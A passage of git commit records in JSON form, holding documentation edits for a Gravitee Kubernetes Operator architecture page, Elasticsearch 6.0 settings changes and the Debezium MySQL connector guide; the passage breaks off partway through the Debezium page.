feedback\n","repos":"gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs,gravitee-io\/gravitee-docs","old_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-architecture.adoc","new_file":"pages\/apim\/3.x\/kubernetes\/apim-kubernetes-operator-architecture.adoc","new_contents":"[[apim-kubernetes-operator-architecture]]\n= GKO Architecture\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_kubernetes_operator_architecture.html\n:page-folder: apim\/kubernetes\n:page-layout: apim3x\n\n== About Gravitee Kubernetes Operators\n\nA link:https:\/\/kubernetes.io\/docs\/concepts\/extend-kubernetes\/operator\/[Kubernetes operator^] is a method of packaging, deploying, and managing a Kubernetes application. A Kubernetes application is both deployed on Kubernetes and managed using the Kubernetes API and `kubectl` tooling.\n\nIn this context, a Kubernetes operator is an application-specific controller that extends the functionality of the Kubernetes API to create, configure, and manage application instances.\n\n== Architecture overview\n\nThe current functionality of the Gravitee Kubernetes Operator (GKO) allows for three main deployment scenarios, as described below.\n\nNOTE: To learn how to deploy GKO on a production cluster, see the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_installation_cluster.html' | relative_url }}[production deployment] section.\n\n=== Standard deployment\n\nIn the standard deployment scenario, the Management API and the API Gateway are deployed in the same Kubernetes cluster.\n\nWith this workflow, the GKO listens for link:{{ '\/apim\/3.x\/apim_kubernetes_operator_definitions.html' | relative_url }}[Custom Resource Definitions (CRDs] and for each custom resource, a link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[ConfigMap^] is created and the API is pushed to the Management API using the import endpoint.\n\nThe API Gateway uses the link:https:\/\/github.com\/gravitee-io\/gravitee-kubernetes\/tree\/master\/gravitee-kubernetes-client[Kubernetes Client^] to listen for `ConfigMap`s (with a custom label), and deploys the APIs accordingly.\n\nThe following diagram illustrates the standard deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-1-standard.png %}[]\n\n=== Deployment on multiple clusters\n\nIn this scenario, the assimption is that both of the following requirements should be met:\n\n1. The user manages multiple Kubernetes clusters with a different set of APIs for each cluster.\n2. All APIs are managed using a single API Console.\n\nTo make this work with GKO, it should be installed on all the required clusters.\n\nThe following diagram illustrates the multi-cluster deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-2-multi-cluster.png %}[]\n\n=== Deployment on multiple environments\n\nIn this scenario, a single GKO is deployed that can publish APIs to different environments (logical or physical). This is managed directly from the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_api_definition.html' | relative_url }}[API Definition] custom resource, which refers a link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_management_context.html' | relative_url }}[Management Context] custom resource.\n\nThe following diagram illustrates the multi-environment deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-3-multi-env.png %}[]\n","old_contents":"[[apim-kubernetes-operator-architecture]]\n= GKO Architecture\n:page-sidebar: apim_3_x_sidebar\n:page-permalink: apim\/3.x\/apim_kubernetes_operator_architecture.html\n:page-folder: apim\/kubernetes\n:page-layout: apim3x\n\n== About Gravitee Kubernetes Operators\n\nA link:https:\/\/kubernetes.io\/docs\/concepts\/extend-kubernetes\/operator\/[Kubernetes operator^] is a method of packaging, deploying, and managing a Kubernetes application. A Kubernetes application is both deployed on Kubernetes and managed using the Kubernetes API and `kubectl` tooling.\n\nIn this context, a Kubernetes operator is an application-specific controller that extends the functionality of the Kubernetes API to create, configure, and manage application instances.\n\n== Architecture overview\n\nThe current functionality of the Gravitee Kubernetes Operator (GKO) allows for three main deployment scenarios, as described below.\n\nNOTE: To learn how to deploy GKO on a production cluster, see the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_installation_cluster.html' | relative_url }}[production deployment] section. \n\n=== Standard deployment\n\nIn the standard deployment scenario, the Management API and the API Gateway are deployed in the same Kubernetes cluster.\n\nWith this workflow, the GKO listens for link:{{ '\/apim\/3.x\/apim_kubernetes_operator_definitions.html' | relative_url }}[Custom Resource Definitions (CRDs] and for each custom resource, a link:https:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[ConfigMap^] is created and the API is pushed to the Management API using the import endpoint.\n\nThe API Gateway uses the link:https:\/\/github.com\/gravitee-io\/gravitee-kubernetes\/tree\/master\/gravitee-kubernetes-client[Kubernetes Client^] to listen for `ConfigMap`s (with a custom label), and deploys the APIs accordingly.\n\nThe following diagram illustrates the standard deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-1-standard.png %}[]\n\n=== Deployment on multiple clusters\n\nIn this scenario, the assimption is that the user manages multiple Kubernetes clusters with a different set of APIs for each cluster. To make this work with GKO, it should be installed on all the required clusters.\n\nThe following diagram illustrates the multi-cluster deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-2-multi-cluster.png %}[]\n\n=== Deployment on multiple environments\n\nIn this scenario, a single GKO is deployed that can publish APIs to different environments (logical or physical). This is managed directly from the link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_api_definition.html' | relative_url }}[API Definition] custom resource, which refers a link:{{ '\/apim\/3.x\/apim_kubernetes_operator_user_guide_management_context.html' | relative_url }}[Management Context] custom resource.\n\nThe following diagram illustrates the multi-environment deployment architectural approach:\n\nimage:{% link \/images\/apim\/3.x\/kubernetes\/gko-architecture-3-multi-env.png %}[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9fcd871a450107747f931980256487876af26729","subject":"Wrong discovery.type for azure in breaking changes (#32432)","message":"Wrong discovery.type for azure in breaking changes (#32432)\n\nShould be `azure` instead of `aws`.","repos":"strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0\/settings.asciidoc","new_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `azure` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n","old_contents":"[[breaking_60_settings_changes]]\n=== Settings changes\n\n==== Remove support for elasticsearch.json and elasticsearch.yaml configuration file\n\nThe configuration file found in the Elasticsearch config directory could previously have\na `.yml`, `.yaml` or `.json` extension. Only `elasticsearch.yml` is now supported.\n\n==== Duplicate keys in configuration file\n\nIn previous versions of Elasticsearch, the configuration file was allowed to\ncontain duplicate keys. For example:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n\nnode\n attr:\n rack: my-rack\n--------------------------------------------------\n\nIn Elasticsearch 6.0.0, this is no longer permitted. Instead, this must be\nspecified in a single key as:\n\n[source,yaml]\n--------------------------------------------------\nnode:\n name: my-node\n attr:\n rack: my-rack\n--------------------------------------------------\n\n==== Coercion of boolean settings\n\nPreviously, Elasticsearch recognized the strings `true`, `false`, `on`, `off`, `yes`, `no`, `0`, `1` as booleans. Elasticsearch 6.0\nrecognizes only `true` and `false` as boolean and will throw an error otherwise. For backwards compatibility purposes, during the 6.x series\nindex settings on pre-6.0 indices will continue to work. Note that this does not apply to node-level settings that are stored\nin `elasticsearch.yml`.\n\n==== Snapshot settings\n\nThe internal setting `cluster.routing.allocation.snapshot.relocation_enabled` that allowed shards with running snapshots to be reallocated to\ndifferent nodes has been removed. Enabling this setting could cause allocation issues if a shard got allocated off a node and then\nreallocated back to this node while a snapshot was running.\n\n==== Store throttling settings\n\nStore throttling has been removed. As a consequence, the\n`indices.store.throttle.type` and `indices.store.throttle.max_bytes_per_sec`\ncluster settings and the `index.store.throttle.type` and\n`index.store.throttle.max_bytes_per_sec` index settings are not\nrecognized anymore.\n\n==== Store settings\n\nThe `default` `index.store.type` has been removed. If you were using it, we\nadvise that you simply remove it from your index settings and Elasticsearch\nwill use the best `store` implementation for your operating system.\n\n==== Network settings\n\nThe blocking TCP client, blocking TCP server, and blocking HTTP server have been removed.\nAs a consequence, the `network.tcp.blocking_server`, `network.tcp.blocking_client`,\n`network.tcp.blocking`,`transport.tcp.blocking_client`, `transport.tcp.blocking_server`,\nand `http.tcp.blocking_server` settings are not recognized anymore.\n\nThe previously unused settings `transport.netty.max_cumulation_buffer_capacity`,\n`transport.netty.max_composite_buffer_components` and\n`http.netty.max_cumulation_buffer_capacity` have been removed.\n\n==== Similarity settings\n\nThe `base` similarity is now ignored as coords and query normalization have\nbeen removed. If provided, this setting will be ignored and issue a\ndeprecation warning.\n\n==== Script Settings\n\nAll of the existing scripting security settings have been removed. Instead\nthey are replaced with `script.allowed_types` and `script.allowed_contexts`.\n\n==== Discovery Settings\n\nThe `discovery.type` settings no longer supports the values `gce`, `aws` and `ec2`.\nIntegration with these platforms should be done by setting the `discovery.zen.hosts_provider` setting to\none of those values.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7f9904dd8854f3e44eb2b52db892f7eb0b4d8633","subject":"DBZ-2127 A few more updates after testing split files downstream","message":"DBZ-2127 A few more updates after testing split files downstream\n","repos":"debezium\/debezium,jpechane\/debezium,jpechane\/debezium,debezium\/debezium,debezium\/debezium,jpechane\/debezium,debezium\/debezium,jpechane\/debezium","old_file":"documentation\/modules\/ROOT\/pages\/connectors\/mysql.adoc","new_file":"documentation\/modules\/ROOT\/pages\/connectors\/mysql.adoc","new_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n:context: debezium\n\n[id=\"debezium-connector-for-mysql\"]\n= {prodname} connector for MySQL\n\nMySQL has a binary log (binlog) that records all operations in the order in which they are committed to the database. This includes changes to table schemas as well as changes to the data in tables. MySQL uses the binlog for replication and recovery.\n\nThe {prodname} MySQL connector reads the binlog, produces change events for row-level `INSERT`, `UPDATE`, and `DELETE` operations, and emits the change events to Kafka topics. Client applications read those Kafka topics.\n\nAs MySQL is typically set up to purge binlogs after a specified period of time, the MySQL connector performs an initial _consistent snapshot_ of each of your databases. The MySQL connector reads the binlog from the point at which the snapshot was made.\n\nifdef::product[]\nInformation and procedures for using a {prodname} MySQL connector are organized as follows:\n\n* xref:how-debezium-mysql-connectors-work[]\n* xref:descriptions-of-debezium-mysql-connector-data-change-events[]\n* xref:how-debezium-mysql-connectors-map-data-types[]\n* xref:setting-up-mysql-to-run-a-debezium-connector[]\n* xref:deploying-debezium-mysql-connectors[]\n* xref:monitoring-debezium-mysql-connector-performance[]\n* xref:how-debezium-mysql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mysql-connectors-work\n\/\/ Title: How {prodname} MySQL connectors work\n[[how-the-mysql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} MySQL connector, it is helpful to understand how the connector tracks the structure of tables, exposes schema changes, performs snapshots, and determines Kafka topic names. An overview of the MySQL topologies that the connector supports is useful for planning your application. \n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-mysql-connectors-handle-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-expose-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-perform-database-snapshots[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records[]\n* xref:mysql-topologies-supported-by-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors handle database schema changes\n[[mysql-schema-history-topic]]\n=== Schema history topic\n\nWhen a database client queries a database, the client uses the database\u2019s current schema. However, the database schema can be changed at any time, which means that the connector must be able to identify what the schema was at the time each insert, update, or delete operation was recorded. Also, a connector cannot just use the current schema because the connector might be processing events that are relatively old and may have been recorded before the tables' schemas were changed. \n\nTo handle this, MySQL includes in the binlog not only the row-level changes to the data, but also the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table\u2019s schema. The connector uses this schema representation to identify the structure of the tables at the time of each insert, update, or delete operation and to produce the appropriate change event. In a separate database history Kafka topic, the connector records all DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector starts reading the binlog from a specific position, that is, from a specific point in time. The connector rebuilds the table structures that existed at this point in time by reading the database history Kafka topic and parsing all DDL statements up to the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only. The connector can optionally See {link-prefix}:{link-mysql-connector}#mysql-schema-change-topic[emit schema change events to a different topic that is intended for consumer applications].\n\nWhen the MySQL connector captures changes in a table to which a schema change tool such as `gh-ost` or `pt-online-schema-change` is applied there are helper tables created during the migration process. The connector needs to be configured to capture change to these helper tables. If consumers do not need the records generated for helper tables then a simple message transform can be applied to filter them out.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-topic-names[default names for topics] that receive {prodname} event records.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-expose-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors expose database schema changes\n[id=\"mysql-schema-change-topic\"]\n=== Schema change topic\n\nYou can configure a {prodname} MySQL connector to produce schema change events that include all DDL statements applied to databases in the MySQL server. The connector emits these events to a Kafka topic named _serverName_ where _serverName_ is the name of the connector as specified by the `database.server.name` connector configuration property.\n\nIf you choose to use _schema change events_, ensure that you consume records from the schema change topic. The database history topic is for connector use only. \n\nIMPORTANT: A global order for events emitted to the schema change topic is vital. Therefore, you must not partition the database history topic. This means that you must specify a partition count of `1` when creating the database history topic. When relying on auto topic creation, make sure that Kafka\u2019s `num.partitions` configuration option, which specifies the default number of partitions, is set to `1`.\n\nEach record that the connector emits to the schema change topic contains a message key that includes the name of the connected database when the DDL statement was applied, for example: \n\n[source,json,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n}\n----\n\nThe schema change event record value contains a structure that includes the DDL statements, the name of the database to which the statements were applied, and the position in the binlog where the statements appeared, for example: \n\n[source,json,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n}\n----\n\nThe `ddl` field might contain multiple DDL statements. Each statement applies to the database in the `databaseName` field. The statements appear in the order in which they were applied to the database. The `source` field is structured exactly as a standard data change event written to table-specific topics. This field is useful to correlate events on different topics.\n\n[source,json,subs=\"+attributes\"]\n----\n....\n\"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,...)\",\n \"source\" : {\n ...\n }\n}\n....\n----\n\nA client can submit multiple DDL statements to be applied to multiple databases. If MySQL applies them atomically, the connector takes the DDL statements in order, groups them by database, and creates a schema change event for each group. If MySQL applies them individually, the connector creates a separate schema change event for each statement.\n\nSee also: {link-prefix}:{link-mysql-connector}#mysql-schema-history-topic[schema history topic].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} MySQL connectors perform database snapshots\n[[mysql-snapshots]]\n=== Snapshots\n\nWhen a {prodname} MySQL connector is first started, it performs an initial _consistent snapshot_ of your database. The following flow describes how the connector creates this snapshot. This flow is for the default snapshot mode, which is `initial`. For information about other snapshot modes, see the {link-prefix}:{link-mysql-connector}#mysql-property-snapshot-mode[MySQL connector `snapshot.mode` configuration property].\n\n.Workflow for performing an initial snapshot with a global read lock\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\na| Grabs a global read lock that blocks _writes_ by other database clients. +\n + \nThe snapshot itself does not prevent other clients from applying DDL that might interfere with the connector's attempt to read the binlog position and table schemas. The connector keeps the global read lock while it reads the binlog position, and releases the lock as described in a later step.\n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\na|Reads the current binlog position.\n\n|4\na|Reads the schema of the databases and tables for which the connector is configured to capture changes.\n\n|5\na|Releases the global read lock. Other database clients can now write to the database.\n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements. \n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\na|Records the completed snapshot in the connector offsets.\n\n|===\n\nConnector restarts::\nIf the connector fails, stops, or is rebalanced while performing the _initial snapshot_, then after the connector restarts, it performs a new snapshot. After that _intial snapshot_ is completed, the {prodname} MySQL connector restarts from the same position in the binlog so it does not miss any updates.\n+\nIf the connector stops for long enough, MySQL could purge old binlog files and the connector's position would be lost. If the position is lost, the connector reverts to the _initial snapshot_ for its starting position. For more tips on troubleshooting the {prodname} MySQL connector, see {link-prefix}:{link-mysql-connector}#mysql-when-things-go-wrong[behavior when things go wrong].\n\nGlobal read locks not allowed::\nSome environments do not allow global read locks. If the {prodname} MySQL connector detects that global read locks are not permitted, the connector uses table-level locks instead and performs a snapshot with this method. This requires the database user for the {prodname} connector to have `LOCK_TABLES` privileges. \n+\n.Workflow for performing an initial snapshot with table-level locks\n[cols=\"1,9\",options=\"header\",subs=\"+attributes\"]\n|===\n|Step |Action\n\n|1\n|Obtains table-level locks. \n\n|2\na|Starts a transaction with link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/innodb-consistent-read.html[repeatable read semantics] to ensure that all subsequent reads within the transaction are done against the _consistent snapshot_.\n\n|3\n|Reads and filters the names of the databases and tables.\n\n|4\na|Reads the current binlog position.\n\n|5\na|Reads the schema of the databases and tables for which the connector is configured to capture changes. \n\n|6\na|If applicable, writes the DDL changes to the schema change topic, including all necessary `DROP...` and `CREATE...` DDL statements.\n\n|7\na|Scans the database tables. For each row, the connector emits `CREATE` events to the relevant table-specific Kafka topics.\n\n|8\na|Commits the transaction.\n\n|9\n|Releases the table-level locks.\n\n|10\na|Records the completed snapshot in the connector offsets.\n\n|===\n\n\/\/ Type: concept\n\/\/ ModuleID: default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records\n\/\/ Title: Default names of Kafka topics that receive {prodname} MySQL change event records\n[[mysql-topic-names]]\n=== Topic names\n\nThe default behavior is that a {prodname} MySQL connector writes events for all `INSERT`, `UPDATE`, and `DELETE` operations in one table to one Kafka topic. The Kafka topic naming convention is as follows:\n\n_serverName.databaseName.tableName_\n\nSuppose that `fulfillment` is the server name, `inventory` is the database name, and the database contains tables named `orders`, `customers`, and `products`. The {prodname} MySQL connector emits events to three Kafka topics, one for each table in the database:\n\n----\nfulfillment.inventory.orders\nfulfillment.inventory.customers\nfulfillment.inventory.products\n----\n\n\/\/ Type: concept\n\/\/ ModuleID: mysql-topologies-supported-by-debezium-connectors\n\/\/ Title: MySQL topologies supported by {prodname} connectors\n[id=\"supported-mysql-topologies\"]\n=== Supported MySQL topologies\n\nThe {prodname} MySQL connector supports the following MySQL topologies:\n\nStandalone::\nWhen a single MySQL server is used, the server must have the binlog enabled (_and optionally GTIDs enabled_) so the {prodname} MySQL connector can monitor the server. This is often acceptable, since the binary log can also be used as an incremental link:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/backup-methods.html[backup]. In this case, the MySQL connector always connects to and follows this standalone MySQL server instance.\n\nPrimary and replica::\nThe {prodname} MySQL connector can follow one of the primary servers or one of the replicas (_if that replica has its binlog enabled_), but the connector sees changes in only the cluster that is visible to that server. Generally, this is not a problem except for the multi-primary topologies.\n+\nThe connector records its position in the server\u2019s binlog, which is different on each server in the cluster. Therefore, the connector must follow just one MySQL server instance. If that server fails, that server must be restarted or recovered before the connector can continue.\n\nHigh available clusters::\nA variety of link:https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[high availability] solutions exist for MySQL, and they make it significantly easier to tolerate and almost immediately recover from problems and failures. Most HA MySQL clusters use GTIDs so that replicas are able to keep track of all changes on any of the primary servers.\n\nMulti-primary::\nlink:https:\/\/dev.mysql.com\/doc\/refman\/{mysql-version}\/en\/mysql-cluster-replication-multi-source.html[Network Database (NDB) cluster replication] uses one or more MySQL replica nodes that each replicate from multiple primary servers. This is a powerful way to aggregate the replication of multiple MySQL clusters. This topology requires the use of GTIDs.\n+\nA {prodname} MySQL connector can use these multi-primary MySQL replicas as sources, and can fail over to different multi-primary MySQL replicas as long as the new replica is caught up to the old replica. That is, the new replica has all transactions that were seen on the first replica. This works even if the connector is using only a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-primary MySQL replica and find the correct position in the binlog.\n\nHosted::\nThere is support for the {prodname} MySQL connector to use hosted options such as Amazon RDS and Amazon Aurora.\n+\nBecause these hosted options do not allow a global read lock, table-level locks are used to create the _consistent snapshot_.\n\n\/\/ Type: assembly\n\/\/ ModuleID: descriptions-of-debezium-mysql-connector-data-change-events\n\/\/ Title: Descriptions of {prodname} MySQL connector data change events\n[[mysql-events]]\n== Data change events\n\nThe {prodname} MySQL connector generates a data change event for each row-level `INSERT`, `UPDATE`, and `DELETE` operation. Each event contains a key and a value. The structure of the key and the value depends on the table that was changed. \n\n{prodname} and Kafka Connect are designed around _continuous streams of event messages_. However, the structure of these events may change over time, which can be difficult for consumers to handle. To address this, each event contains the schema for its content or, if you are using a schema registry, a schema ID that a consumer can use to obtain the schema from the registry. This makes each event self-contained. \n\nThe following skeleton JSON shows the basic four parts of a change event. However, how you configure the Kafka Connect converter that you choose to use in your application determines the representation of these four parts in change events. A `schema` field is in a change event only when you configure the converter to produce it. Likewise, the event key and event payload are in a change event only if you configure a converter to produce it. If you use the JSON converver and you configure it to produce all four basic change event parts, change events have this structure: \n\n[source,json,index=0]\n----\n{\n \"schema\": { \/\/<1>\n ...\n },\n \"payload\": { \/\/<2>\n ...\n },\n \"schema\": { \/\/<3> \n ...\n },\n \"payload\": { \/\/<4>\n ...\n },\n}\n----\n\n.Overview of change event basic content\n[cols=\"1,2,7\",options=\"header\"]\n|===\n|Item |Field name |Description\n\n|1\n|`schema`\n|The first `schema` field is part of the event key. It specifies a Kafka Connect schema that describes what is in the event key's `payload` portion. In other words, the first `schema` field describes the structure of the primary key, or the unique key if the table does not have a primary key, for the table that was changed. +\n +\nIt is possible to override the table's primary key by setting the {link-prefix}:{link-mysql-connector}#mysql-property-message-key-columns[`message.key.columns` connector configuration property]. In this case, the first schema field describes the structure of the key identified by that property.\n\n|2\n|`payload`\n|The first `payload` field is part of the event key. It has the structure described by the previous `schema` field and it contains the key for the row that was changed. \n\n|3\n|`schema`\n|The second `schema` field is part of the event value. It specifies the Kafka Connect schema that describes what is in the event value's `payload` portion. In other words, the second `schema` describes the structure of the row that was changed. Typically, this schema contains nested schemas. \n\n|4\n|`payload`\n|The second `payload` field is part of the event value. It has the structure described by the previous `schema` field and it contains the actual data for the row that was changed.\n\n|===\n\nBy default, the connector streams change event records to topics with names that are the same as the event's originating table. See {link-prefix}:{link-mysql-connector}#mysql-topic-names[topic names].\n\n[WARNING]\n====\nThe MySQL connector ensures that all Kafka Connect schema names adhere to the link:http:\/\/avro.apache.org\/docs\/current\/spec.html#names[Avro schema name format]. This means that the logical server name must start with a Latin letter or an underscore, that is, a-z, A-Z, or pass:[_]. Each remaining character in the logical server name and each character in the database and table names must be a Latin letter, a digit, or an underscore, that is, a-z, A-Z, 0-9, or pass:[_]. If there is an invalid character it is replaced with an underscore character.\n\nThis can lead to unexpected conflicts if the logical server name, a database name, or a table name contains invalid characters, and the only characters that distinguish names from one another are invalid and thus replaced with underscores.\n====\n\nifdef::product[]\nMore details are in the following topics:\n\n* xref:about-keys-in-debezium-mysql-change-events[]\n* xref:about-values-in-debezium-mysql-change-events[]\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: about-keys-in-debezium-mysql-change-events\n\/\/ Title: About keys in {prodname} mysql change events\n[[mysql-change-event-keys]]\n=== Change event keys\n\nA change event's key contains the schema for the changed table's key and the changed row's actual key. Both the schema and its corresponding payload contain a field for each column in the changed table's `PRIMARY KEY` (or unique constraint) at the time the connector created the event.\n\nConsider the following `customers` table, which is followed by an example of a change event key for this table. \n\n[source,sql]\n----\nCREATE TABLE customers (\n id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,\n first_name VARCHAR(255) NOT NULL,\n last_name VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL UNIQUE KEY\n) AUTO_INCREMENT=1001;\n----\n\nEvery change event that captures a change to the `customers` table has the same event key schema. For as long as the `customers` table has the previous definition, every change event that captures a change to the `customers` table has the following key structure. In JSON, it looks 